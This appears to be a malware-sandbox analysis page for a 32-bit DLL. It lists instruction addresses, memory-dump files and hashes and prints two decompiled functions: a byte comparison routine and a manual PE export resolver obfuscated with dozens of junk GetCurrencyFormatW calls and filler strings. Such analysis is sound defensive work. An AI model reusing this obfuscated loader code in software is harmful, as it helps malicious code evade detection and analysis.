0x10021c68
0x00000000
0x00000000
0x00000000
0x10021c68
0x10021c43
0x10021c47
0x00000000
0x00000000
0x00000000
0x10021c47
0x10021c22
0x10021c26
0x00000000
0x00000000
0x00000000
0x10021c26
0x10021b83
0x10021b85
0x10021b9c
0x10021ba4
0x10021ba6
0x10021bbd
0x10021bc5
0x10021bc7
0x10021bde
0x10021be6
0x10021be8
0x10021bf5
0x10021bf5
0x00000000
0x10021be8
0x10021bd4
0x10021bd8
0x00000000
0x00000000
0x00000000
0x10021bd8
0x10021bb3
0x10021bb7
0x00000000
0x00000000
0x00000000
0x10021bb7
0x10021b92
0x10021b96
0x00000000
0x00000000
0x00000000
0x10021b96
0x10021af4
0x10021af6
0x10021b0d
0x10021b15
0x10021b17
0x10021b2e
0x10021b36
0x10021b38
0x10021b4f
0x10021b57
0x10021b59
0x10021b66
0x10021b66
0x00000000
0x10021b59
0x10021b45
0x10021b49
0x00000000
0x00000000
0x00000000
0x10021b49
0x10021b24
0x10021b28
0x00000000
0x00000000
0x00000000
0x10021b28
0x10021b03
0x10021b07
0x00000000
0x00000000
0x00000000
0x10021b07
0x10021a65
0x10021a67
0x10021a7e
0x10021a86
0x10021a88
0x10021a9f
0x10021aa7
0x10021aa9
0x10021ac0
0x10021ac8
0x10021aca
0x10021ad7
0x10021ad7
0x00000000
0x10021aca
0x10021ab6
0x10021aba
0x00000000
0x00000000
0x00000000
0x10021aba
0x10021a95
0x10021a99
0x00000000
0x00000000
0x00000000
0x10021a99
0x10021a74
0x10021a78
0x00000000
0x00000000
0x00000000
0x10021a78
0x100219d6
0x100219d8
0x100219ef
0x100219f7
0x100219f9
0x10021a10
0x10021a18
0x10021a1a
0x10021a31
0x10021a39
0x10021a3b
0x10021a48
0x10021a48
0x00000000
0x10021a3b
0x10021a27
0x10021a2b
0x00000000
0x00000000
0x00000000
0x10021a2b
0x10021a06
0x10021a0a
0x00000000
0x00000000
0x00000000
0x10021a0a
0x100219e5
0x100219e9
0x00000000
0x00000000
0x00000000
0x10021940
0x10021940
0x10021943
0x10021947
0x10021949
0x10021960
0x10021960
0x10021964
0x10021968
0x1002196a
0x10021981
0x10021981
0x10021985
0x10021989
0x1002198b
0x100219a2
0x100219a2
0x100219a6
0x100219aa
0x100219ac
0x100219b2
0x100219b5
0x100219b9
0x100219b9
0x00000000
0x100219ac
0x10021991
0x10021994
0x10021998
0x1002199c
0x00000000
0x00000000
0x00000000
0x1002199c
0x10021970
0x10021973
0x10021977
0x1002197b
0x00000000
0x00000000
0x00000000
0x1002197b
0x1002194f
0x10021952
0x10021956
0x1002195a
0x00000000
0x00000000
0x00000000
0x1002195a
0x1002155d
0x1002155d
0x00000000

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction ID: 6af215656b7b663fef1c66103eb4b28a24fc01d7554443f013e046fd6066f34d
Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction Fuzzy Hash: E2C1A47BC0B9F3868776C12D606416EEEA29FE15913ABC3E1CCE43F28992279D0085D0

Uniqueness

Uniqueness Score: -1.00%

Function 10021564 Relevance: .4, Instructions: 351
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10021564(void* __eax, void* __ecx) {
				void* _t177;
				signed int _t178;
				void* _t181;
				signed char _t187;
				signed char _t188;
				signed char _t189;
				signed char _t191;
				signed char _t192;
				signed int _t198;
				signed int _t284;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t321;
				void* _t323;
				void* _t325;

				_t181 = __ecx;
				_t177 = __eax;
				if( *((intOrPtr*)(__eax - 0x1c)) ==  *((intOrPtr*)(__ecx - 0x1c))) {
					_t284 = 0;
					L11:
					if(_t284 != 0) {
						goto L1;
					}
					_t187 =  *(_t177 - 0x18);
					if(_t187 ==  *(_t181 - 0x18)) {
						_t284 = 0;
						L22:
						if(_t284 != 0) {
							goto L1;
						}
						_t188 =  *(_t177 - 0x14);
						if(_t188 ==  *(_t181 - 0x14)) {
							_t284 = 0;
							L33:
							if(_t284 != 0) {
								goto L1;
							}
							_t189 =  *(_t177 - 0x10);
							if(_t189 ==  *(_t181 - 0x10)) {
								_t284 = 0;
								L44:
								if(_t284 != 0) {
									goto L1;
								}
								if( *(_t177 - 0xc) ==  *(_t181 - 0xc)) {
									_t284 = 0;
									L55:
									if(_t284 != 0) {
										goto L1;
									}
									_t191 =  *(_t177 - 8);
									if(_t191 ==  *(_t181 - 8)) {
										_t284 = 0;
										L66:
										if(_t284 != 0) {
											goto L1;
										}
										_t192 =  *(_t177 - 4);
										if(_t192 ==  *(_t181 - 4)) {
											_t178 = 0;
											L78:
											if(_t178 == 0) {
												_t178 = 0;
											}
											L80:
											return _t178;
										}
										_t287 = (_t192 & 0x000000ff) - ( *(_t181 - 4) & 0x000000ff);
										if(_t287 == 0) {
											L70:
											_t289 = ( *(_t177 - 3) & 0x000000ff) - ( *(_t181 - 3) & 0x000000ff);
											if(_t289 == 0) {
												L72:
												_t291 = ( *(_t177 - 2) & 0x000000ff) - ( *(_t181 - 2) & 0x000000ff);
												if(_t291 == 0) {
													L75:
													_t178 = ( *(_t177 - 1) & 0x000000ff) - ( *(_t181 - 1) & 0x000000ff);
													if(_t178 != 0) {
														_t178 = (0 | _t178 > 0x00000000) + (0 | _t178 > 0x00000000) - 1;
													}
													goto L78;
												}
												_t198 = (0 | _t291 > 0x00000000) + (0 | _t291 > 0x00000000) - 1;
												if(_t198 == 0) {
													goto L75;
												}
												L74:
												_t178 = _t198;
												goto L78;
											}
											_t198 = (0 | _t289 > 0x00000000) + (0 | _t289 > 0x00000000) - 1;
											if(_t198 != 0) {
												goto L74;
											}
											goto L72;
										}
										_t198 = (0 | _t287 > 0x00000000) + (0 | _t287 > 0x00000000) - 1;
										if(_t198 != 0) {
											goto L74;
										}
										goto L70;
									}
									_t293 = (_t191 & 0x000000ff) - ( *(_t181 - 8) & 0x000000ff);
									if(_t293 == 0) {
										L59:
										_t295 = ( *(_t177 - 7) & 0x000000ff) - ( *(_t181 - 7) & 0x000000ff);
										if(_t295 == 0) {
											L61:
											_t297 = ( *(_t177 - 6) & 0x000000ff) - ( *(_t181 - 6) & 0x000000ff);
											if(_t297 == 0) {
												L63:
												_t284 = ( *(_t177 - 5) & 0x000000ff) - ( *(_t181 - 5) & 0x000000ff);
												if(_t284 != 0) {
													_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
												}
												goto L66;
											}
											_t284 = (0 | _t297 > 0x00000000) + (0 | _t297 > 0x00000000) - 1;
											if(_t284 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t284 = (0 | _t295 > 0x00000000) + (0 | _t295 > 0x00000000) - 1;
										if(_t284 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t284 = (0 | _t293 > 0x00000000) + (0 | _t293 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t300 = ( *(_t177 - 0xc) & 0x000000ff) - ( *(_t181 - 0xc) & 0x000000ff);
								if(_t300 == 0) {
									L48:
									_t302 = ( *(_t177 - 0xb) & 0x000000ff) - ( *(_t181 - 0xb) & 0x000000ff);
									if(_t302 == 0) {
										L50:
										_t304 = ( *(_t177 - 0xa) & 0x000000ff) - ( *(_t181 - 0xa) & 0x000000ff);
										if(_t304 == 0) {
											L52:
											_t284 = ( *(_t177 - 9) & 0x000000ff) - ( *(_t181 - 9) & 0x000000ff);
											if(_t284 != 0) {
												_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
											}
											goto L55;
										}
										_t284 = (0 | _t304 > 0x00000000) + (0 | _t304 > 0x00000000) - 1;
										if(_t284 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t284 = (0 | _t302 > 0x00000000) + (0 | _t302 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t284 = (0 | _t300 > 0x00000000) + (0 | _t300 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t307 = (_t189 & 0x000000ff) - ( *(_t181 - 0x10) & 0x000000ff);
							if(_t307 == 0) {
								L37:
								_t309 = ( *(_t177 - 0xf) & 0x000000ff) - ( *(_t181 - 0xf) & 0x000000ff);
								if(_t309 == 0) {
									L39:
									_t311 = ( *(_t177 - 0xe) & 0x000000ff) - ( *(_t181 - 0xe) & 0x000000ff);
									if(_t311 == 0) {
										L41:
										_t284 = ( *(_t177 - 0xd) & 0x000000ff) - ( *(_t181 - 0xd) & 0x000000ff);
										if(_t284 != 0) {
											_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
										}
										goto L44;
									}
									_t284 = (0 | _t311 > 0x00000000) + (0 | _t311 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t284 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t284 = (0 | _t307 > 0x00000000) + (0 | _t307 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t314 = (_t188 & 0x000000ff) - ( *(_t181 - 0x14) & 0x000000ff);
						if(_t314 == 0) {
							L26:
							_t316 = ( *(_t177 - 0x13) & 0x000000ff) - ( *(_t181 - 0x13) & 0x000000ff);
							if(_t316 == 0) {
								L28:
								_t318 = ( *(_t177 - 0x12) & 0x000000ff) - ( *(_t181 - 0x12) & 0x000000ff);
								if(_t318 == 0) {
									L30:
									_t284 = ( *(_t177 - 0x11) & 0x000000ff) - ( *(_t181 - 0x11) & 0x000000ff);
									if(_t284 != 0) {
										_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
									}
									goto L33;
								}
								_t284 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t284 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t284 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
						if(_t284 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t321 = (_t187 & 0x000000ff) - ( *(_t181 - 0x18) & 0x000000ff);
					if(_t321 == 0) {
						L15:
						_t323 = ( *(_t177 - 0x17) & 0x000000ff) - ( *(_t181 - 0x17) & 0x000000ff);
						if(_t323 == 0) {
							L17:
							_t325 = ( *(_t177 - 0x16) & 0x000000ff) - ( *(_t181 - 0x16) & 0x000000ff);
							if(_t325 == 0) {
								L19:
								_t284 = ( *(_t177 - 0x15) & 0x000000ff) - ( *(_t181 - 0x15) & 0x000000ff);
								if(_t284 != 0) {
									_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
								}
								goto L22;
							}
							_t284 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t284 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
						if(_t284 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t284 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
					if(_t284 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1c) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
					if(__esi == 0) {
						L4:
						__esi =  *(__eax - 0x1b) & 0x000000ff;
						__edx =  *(__ecx - 0x1b) & 0x000000ff;
						__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
						if(__esi == 0) {
							L6:
							__esi =  *(__eax - 0x1a) & 0x000000ff;
							__edx =  *(__ecx - 0x1a) & 0x000000ff;
							__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
							if(__esi == 0) {
								L8:
								__esi =  *(__eax - 0x19) & 0x000000ff;
								__edx =  *(__ecx - 0x19) & 0x000000ff;
								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L11;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t178 = _t284;
				goto L80;
			}

0x10021564
0x10021564
0x1002156a
0x100215dd
0x100215df
0x100215e1
0x00000000
0x00000000
0x100215e7
0x100215ed
0x1002166c
0x1002166e
0x10021670
0x00000000
0x00000000
0x10021676
0x1002167c
0x100216fb
0x100216fd
0x100216ff
0x00000000
0x00000000
0x10021705
0x1002170b
0x1002178a
0x1002178c
0x1002178e
0x00000000
0x00000000
0x1002179a
0x1002181a
0x1002181c
0x1002181e
0x00000000
0x00000000
0x10021824
0x1002182a
0x100218a9
0x100218ab
0x100218ad
0x00000000
0x00000000
0x100218b3
0x100218b9
0x1002192a
0x1002192c
0x1002192e
0x10021930
0x10021930
0x10021932
0x1002268e
0x1002268e
0x100218c2
0x100218c4
0x100218d5
0x100218dd
0x100218df
0x100218f0
0x100218f8
0x100218fa
0x1002190f
0x10021917
0x10021919
0x10021926
0x10021926
0x00000000
0x10021919
0x10021903
0x10021909
0x00000000
0x00000000
0x1002190b
0x1002190b
0x00000000
0x1002190b
0x100218e8
0x100218ee
0x00000000
0x00000000
0x00000000
0x100218ee
0x100218cd
0x100218d3
0x00000000
0x00000000
0x00000000
0x100218d3
0x10021833
0x10021835
0x1002184c
0x10021854
0x10021856
0x1002186d
0x10021875
0x10021877
0x1002188e
0x10021896
0x10021898
0x100218a5
0x100218a5
0x00000000
0x10021898
0x10021884
0x10021888
0x00000000
0x00000000
0x00000000
0x10021888
0x10021863
0x10021867
0x00000000
0x00000000
0x00000000
0x10021867
0x10021842
0x10021846
0x00000000
0x00000000
0x00000000
0x10021846
0x100217a4
0x100217a6
0x100217bd
0x100217c5
0x100217c7
0x100217de
0x100217e6
0x100217e8
0x100217ff
0x10021807
0x10021809
0x10021816
0x10021816
0x00000000
0x10021809
0x100217f5
0x100217f9
0x00000000
0x00000000
0x00000000
0x100217f9
0x100217d4
0x100217d8
0x00000000
0x00000000
0x00000000
0x100217d8
0x100217b3
0x100217b7
0x00000000
0x00000000
0x00000000
0x100217b7
0x10021714
0x10021716
0x1002172d
0x10021735
0x10021737
0x1002174e
0x10021756
0x10021758
0x1002176f
0x10021777
0x10021779
0x10021786
0x10021786
0x00000000
0x10021779
0x10021765
0x10021769
0x00000000
0x00000000
0x00000000
0x10021769
0x10021744
0x10021748
0x00000000
0x00000000
0x00000000
0x10021748
0x10021723
0x10021727
0x00000000
0x00000000
0x00000000
0x10021727
0x10021685
0x10021687
0x1002169e
0x100216a6
0x100216a8
0x100216bf
0x100216c7
0x100216c9
0x100216e0
0x100216e8
0x100216ea
0x100216f7
0x100216f7
0x00000000
0x100216ea
0x100216d6
0x100216da
0x00000000
0x00000000
0x00000000
0x100216da
0x100216b5
0x100216b9
0x00000000
0x00000000
0x00000000
0x100216b9
0x10021694
0x10021698
0x00000000
0x00000000
0x00000000
0x10021698
0x100215f6
0x100215f8
0x1002160f
0x10021617
0x10021619
0x10021630
0x10021638
0x1002163a
0x10021651
0x10021659
0x1002165b
0x10021668
0x10021668
0x00000000
0x1002165b
0x10021647
0x1002164b
0x00000000
0x00000000
0x00000000
0x1002164b
0x10021626
0x1002162a
0x00000000
0x00000000
0x00000000
0x1002162a
0x10021605
0x10021609
0x00000000
0x00000000
0x00000000
0x1002156c
0x1002156c
0x1002156f
0x10021573
0x10021575
0x10021588
0x10021588
0x1002158c
0x10021590
0x10021592
0x100215a5
0x100215a5
0x100215a9
0x100215ad
0x100215af
0x100215c2
0x100215c2
0x100215c6
0x100215ca
0x100215cc
0x100215d2
0x100215d5
0x100215d9
0x100215d9
0x00000000
0x100215cc
0x100215b5
0x100215b8
0x100215bc
0x100215c0
0x00000000
0x00000000
0x00000000
0x100215c0
0x10021598
0x1002159b
0x1002159f
0x100215a3
0x00000000
0x00000000
0x00000000
0x100215a3
0x1002157b
0x1002157e
0x10021582
0x10021586
0x00000000
0x00000000
0x00000000
0x10021586
0x1002155d
0x1002155d
0x00000000

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction ID: 2da0e54dddefb41058fc70ab6449d090570112ad5eb19a5968f9a25804f4f724
Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction Fuzzy Hash: E0C1847BD0A9F3468775C12D606816EEEA3AFE158139FC3E1CCE42F289D6279D0195D0

Uniqueness

Uniqueness Score: -1.00%

Function 10003122 Relevance: 59.9, APIs: 32, Strings: 2, Instructions: 377
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E10003122(signed int _a4, signed short _a8) {
				signed int _v4;
				void* _v8;
				intOrPtr* _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t113;
				signed int _t124;
				intOrPtr _t125;
				int _t129;
				signed int _t130;
				signed int _t133;
				void* _t140;
				signed int _t141;
				void* _t173;
				signed int _t177;
				signed int _t184;
				intOrPtr* _t186;
				signed int _t196;
				signed int _t197;
				short* _t198;
				void* _t238;

				_t238 =  &_v24;
				_t198 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v20 =  *((intOrPtr*)(_a4 + 4));
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0;
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + _v4;
				_t113 =  *_a4 + 0x78 + (GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + _v4) * 8;
				_v8 = _t113;
				if( *((intOrPtr*)(_t113 + 4)) == 0) {
					L16:
					return 0;
				}
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) * 0x28;
				_v24 = (GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) + _v4) *  *0x100440d0 +  *_v8 + _v20;
				if( *(_v24 + 0x18) == GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4) {
					goto L16;
				}
				_t124 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
				_t125 = _v24;
				if( *((intOrPtr*)(_t125 + 0x14)) == _t124 *  *0x100440e0) {
					goto L16;
				}
				_push(0x22b9);
				_push(L"xadqsavcbdfewescGADW");
				_push(0);
				_push(_t198);
				_push(0x11d4);
				_push(0);
				if(_a8 >> 0x10 != 0) {
					if(GetCurrencyFormatW() *  *0x100440d4 + (0 |  *(_v24 + 0x18) == 0x00000000) != 0) {
						goto L16;
					}
					_t129 = 0;
					if( *(_a4 + 0x30) != 0) {
						L12:
						_t130 = GetCurrencyFormatW(_t129, 0x11d4, _t198, _t129, L"xadqsavcbdfewescGADW", 0x22b9);
						_t133 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_t140 = bsearch(_t238 + 0x40 + GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 * 4,  *(_a4 + 0x30), _t133 *  *0x100440d4 +  *(_v24 + 0x18), _t130 *  *0x100440d4 + 8, E1000310E);
						if(_t140 == 0) {
							goto L16;
						}
						_t141 =  *(_t140 + 4) & 0x0000ffff;
						L14:
						_a4 = _t141;
						if(_a4 > GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_v24 + 0x14))) {
							goto L16;
						}
						return  *((intOrPtr*)(GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc +  *((intOrPtr*)(_v24 + 0x1c)) + _v20 + _a4 * 4)) + _v20;
					}
					_v4 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 << 2;
					_v16 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_v24 + 0x20)) + _v4 + _v20;
					_v4 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8 + GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8;
					_v12 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 +  *((intOrPtr*)(_v24 + 0x24)) + _v4 + _v20;
					_v4 = malloc(GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 +  *(_v24 + 0x18) * 8);
					_t173 = _v4 + GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc * 8;
					_v8 = _t173;
					 *(_a4 + 0x30) = _t173;
					if(_t173 == 0) {
						goto L16;
					}
					_v4 = _v4 & 0x00000000;
					if(GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 +  *(_v24 + 0x18) == 0) {
						L11:
						_t177 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						qsort( *(_a4 + 0x30), GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc +  *(_v24 + 0x18), _t177 *  *0x100440d8 + 8, E100030AA);
						_t238 = _t238 + 0x10;
						_t129 = 0;
						goto L12;
					} else {
						goto L10;
					}
					do {
						L10:
						_t184 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_t186 = _v8;
						 *_t186 = _t184 *  *0x100440dc + _v20 +  *_v16;
						 *((short*)(_t186 + 4)) =  *_v12;
						GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_v4 = _v4 + 1;
						GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_v16 = _v16 + 4;
						GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_v12 = _v12 + 2;
						GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_v8 = _v8 + 8;
					} while (_v4 < GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 +  *(_v24 + 0x18));
					goto L11;
				}
				_a4 =  *((intOrPtr*)(_t125 + 0x10));
				_v4 = _a8 & 0x0000ffff;
				_t196 = GetCurrencyFormatW(??, ??, ??, ??, ??, ??);
				_t197 = _v4;
				if(_t197 < _t196 *  *0x100440d0 + _a4) {
					goto L16;
				}
				_t141 = _t197 - _a4;
				goto L14;
			}

0x10003122
0x10003143
0x10003151
0x1000316a
0x10003187
0x1000319e
0x100031a7
0x100031ab
0x1000355d
0x00000000
0x1000355d
0x100031cc
0x100031f3
0x10003207
0x00000000
0x00000000
0x10003219
0x10003224
0x1000322b
0x00000000
0x00000000
0x10003235
0x10003236
0x1000323b
0x1000323d
0x10003244
0x10003245
0x10003247
0x10003294
0x00000000
0x00000000
0x1000329e
0x100032a3
0x1000349f
0x100034ae
0x100034c7
0x100034f9
0x10003504
0x00000000
0x00000000
0x10003506
0x1000350a
0x10003516
0x1000352e
0x00000000
0x00000000
0x00000000
0x10003557
0x100032cb
0x100032f3
0x1000330e
0x10003336
0x10003361
0x10003372
0x1000337b
0x1000337f
0x10003382
0x00000000
0x00000000
0x10003388
0x100033a9
0x10003452
0x10003463
0x10003494
0x1000349a
0x1000349d
0x00000000
0x00000000
0x00000000
0x00000000
0x100033af
0x100033af
0x100033bb
0x100033d0
0x100033dc
0x100033e9
0x100033ed
0x100033ef
0x100033ff
0x10003401
0x10003412
0x10003414
0x10003425
0x10003427
0x10003448
0x00000000
0x100033af
0x1000324c
0x10003255
0x10003259
0x10003268
0x1000326e
0x00000000
0x00000000
0x10003274
0x00000000

APIs

GetCurrencyFormatW.KERNEL32 ref: 10003155
GetCurrencyFormatW.KERNEL32 ref: 1000316E
GetCurrencyFormatW.KERNEL32 ref: 1000318B
GetCurrencyFormatW.KERNEL32 ref: 100031BB
GetCurrencyFormatW.KERNEL32 ref: 100031D0
GetCurrencyFormatW.KERNEL32 ref: 100031F7
GetCurrencyFormatW.KERNEL32 ref: 10003219
GetCurrencyFormatW.KERNEL32 ref: 10003259
GetCurrencyFormatW.KERNEL32 ref: 1000327D
GetCurrencyFormatW.KERNEL32 ref: 100032B3
GetCurrencyFormatW.KERNEL32 ref: 100032CF
GetCurrencyFormatW.KERNEL32 ref: 100032F7
GetCurrencyFormatW.KERNEL32 ref: 10003312
GetCurrencyFormatW.KERNEL32 ref: 1000333A
malloc.MSVCRT ref: 1000334E
GetCurrencyFormatW.KERNEL32 ref: 10003365
GetCurrencyFormatW.KERNEL32 ref: 10003399
GetCurrencyFormatW.KERNEL32 ref: 1000351A
GetCurrencyFormatW.KERNEL32 ref: 1000353C

Strings

xadqsavcbdfewescGADW, xrefs: 1000313C, 1000315F, 1000317C, 100031B2, 100031C1, 100031E8, 1000320E, 10003236, 100032AA, 100032BD, 100032E4, 10003301, 10003327, 10003356, 1000338E, 100033B0, 100033D5, 100033F4, 10003407, 1000341A, 1000342D, 10003458, 10003471, 100034A5, 100034BC, 100034E0, 1000350B, 10003531
